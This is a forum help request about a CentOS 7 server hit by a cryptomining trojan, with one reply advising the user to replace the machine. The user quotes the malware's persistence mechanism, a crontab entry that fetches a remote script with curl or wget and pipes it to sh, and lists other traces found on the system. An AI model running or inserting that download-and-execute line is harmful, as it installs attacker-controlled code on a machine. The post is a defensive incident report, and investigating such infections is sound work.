weixin_45926390 2019-11-25 10:52 采纳率: 100%
浏览 1567

centos7 中毒挖矿木马,找不到进程找不到脚本位置,求帮忙~

  1. top无占用大量CPU的进程,内存正常。
  2. 目前只有crontab相关文件里面存在脚本命令(如/var/spool/cron/root; /var/spool/cron/crontabs/root; /etc/crontab; /etc/cron.d/root; /etc/bashrc ) # */30 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
  3. crontab -l 查看有个定时任务,删不掉,2中的文件无法删除,即使删除也会再次生成。 # (*/15 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh)
  4. 按照定时任务crul网址打开的是个脚本: 图片说明
  5. 发现病毒文件/usr/bin/b1e06d5d739eeb,不知是什么文件,打开乱码,即使删除也会再次生成。
  6. 开机自启项有sshservice文件,改文件有配置指向/usr/bin/b1e06d5d739eeb

图片说明
8. 亡羊补牢,目前已经关闭redis,做了端口和IP限制,改了ssh端口和密码,停用了curl和wget命令,伪造假文件/usr/bin/b1e06d5d739eeb(伪造的文件一直为空),但是一直找不到该病毒的进程和脚本位置,希望大佬们帮忙分析~

  • 写回答

2条回答 默认 最新

  • rpmdeb 2019-11-25 11:01
    关注

    换机器吧,就算找到了,你确定你能删除干净吗?想找的话, 你看下你的ps ls find grep top这些命令是不是也是被污染了;把正常的进程全都停止,看下存在的活跃进程。

    评论

报告相同问题?

悬赏问题

  • ¥100 有人会搭建GPT-J-6B框架吗?有偿
  • ¥15 求差集那个函数有问题,有无佬可以解决
  • ¥15 【提问】基于Invest的水源涵养
  • ¥20 微信网友居然可以通过vx号找到我绑的手机号
  • ¥15 寻一个支付宝扫码远程授权登录的软件助手app
  • ¥15 解riccati方程组
  • ¥15 display:none;样式在嵌套结构中的已设置了display样式的元素上不起作用?
  • ¥15 使用rabbitMQ 消息队列作为url源进行多线程爬取时,总有几个url没有处理的问题。
  • ¥15 Ubuntu在安装序列比对软件STAR时出现报错如何解决
  • ¥50 树莓派安卓APK系统签名